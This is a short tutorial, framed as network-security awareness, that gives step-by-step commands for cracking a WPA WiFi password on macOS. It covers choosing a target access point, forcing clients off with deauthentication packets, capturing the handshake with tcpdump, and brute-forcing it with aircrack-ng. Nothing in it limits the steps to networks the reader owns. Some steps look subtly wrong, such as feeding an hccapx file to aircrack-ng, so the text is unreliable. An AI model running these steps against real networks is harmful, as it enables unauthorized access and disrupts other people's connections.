Secure your network by knowing how someone may hack your WiFi with MacOS.
Cracking wifi with MacOS
- Install Homebrew
ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
- Install cap2hccapx from JamWiFi
gcc -o cap2hccapx cap2hccapx.c
sudo mv cap2hccapx /usr/local/bin/cap2hccapx
- Build with make the src folder of hashcat-utils and copy cap2hccapx.bin to your working directory.
- Install aircrack-ng
brew install aircrack-ng
- Add aircrack-ng to path
- Add airport to path
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
- Open JamWiFi. Press Scan.
- Choose target. The less RRSSI, the better signal it has. (Ex. -54 is better than -74).
- Copy the BSSID and CHANNEL of the selected target Access Point. (Change the data between <>, with these characters included, for the correct data.)
- Disconnect from the wifi you are connected to, without disabling it. Use
sudo airport -z
sudo airport -c$CHANNEL
- Capture the bacon
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en0 -w beacon.cap
- Capture handshake
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w handshake.cap
- On JamWiFi choose the target and press Deauth, press Monitor, wait for some Packets to load and then Do it!. When you get ~50 Deauths press Done.
- CTRL+C on the Terminal to terminate the capturing of handshake.
- Merge the Beacon and Handshake
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
- Convert cap to hccapx
cap2hccapx capture.cap capture.hccapxIf it says 'Written 0 WPA Handshakes to: capture.hccapx', try again to capture
- Starting brute force with wordlist. Change last data with path to your wordlist file.
aircrack-ng -1 -a 1 -b $BSSID capture.hccapx -w <wordlist>